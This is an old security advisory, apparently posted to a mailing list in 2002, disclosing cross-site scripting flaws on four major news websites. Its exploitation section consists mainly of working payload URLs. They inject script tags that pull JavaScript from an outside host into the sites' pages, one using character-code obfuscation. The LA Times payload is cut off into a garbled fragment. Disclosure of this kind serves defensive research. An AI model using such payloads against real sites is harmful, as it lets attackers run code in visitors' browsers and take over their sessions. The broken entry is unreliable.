Point Blank Security Notice
Friday, March 08, 2002

Title: Subversion of Information Vulnerabilities on Major News Sites
Advisory: PBS0302002

Author: Jeremiah Jacks, Point Blank Security

Summary: http://www.cert.org/advisories/CA-2000-02.html

Disclaimer:
 This information is provided "AS IS". Point Blank Security and the
 author of this document disclaim all warranties, express and implied,
 with regard to this information. This information is provided only for
 legitimate security analysis purposes. Point Blank Security and the
 author does not condone the unauthorized access of systems, and
 specifically prohibits the use or reproduction of this information
 for such purposes. In no event shall Point Blank Security or the author
 be liable for any damages whatsoever arising out of or in connection
 with the use or dissemination of this information. Any use of this
 information is at the user's own risk.

Exploitation:

LA Times
 01)
http://latimes.com/search/lat_all.jsp?Query=
urity.com/css/latimes.js></script>
 Credit: Jeremiah Jacks

NY Times
 01)
http://www.nytimes.com/corrections.html?pagewanted="><script>document.writel
n('<script');document.writeln('src=http://pointblanksecurity.com/css/nytimes
.js><\/script>');</script><a+href="
 Credit: Jeremiah Jacks

Newsbytes
 01)
http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&e
mail.address="><script>function+Chr(code){return+String.fromCharCode(code);}
document.writeln('<script');document.write('src');document.write(Chr(61));do
cument.write('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</
script><a
 Credit: Jeremiah Jacks

The Washington Post
 01)
http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&C
OUNTRY=<script+src=http://pointblanksecurity.com/css/washpost.js></script>
 Credit: Jeremiah Jacks

More Examples At: http://www.pointblanksecurity.com/css/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]